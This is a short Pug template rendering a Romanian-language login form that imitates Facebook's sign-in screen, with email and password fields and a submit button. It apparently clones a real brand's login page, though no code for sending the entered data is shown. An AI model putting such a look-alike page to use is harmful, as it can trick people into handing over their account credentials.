extends base

block content
  .facebook-screen
    .facebook
    form.form-login.facebook-form
      .facebook-field
        input#email.facebook-label(type='email' placeholder="Telefon sau e-mail")
      .facebook-field
        input#password.facebook-label(type='password' required, minlength='8' placeholder="Parola")
      .facebook-field
        button.btn.facebook-btn(type='submit') Conectare
        .btn.facebook-uitat Ai uitat parola?
      .facebook-field
        .btn.facebook-cont Creaza un cont nou de Facebook
 
        
    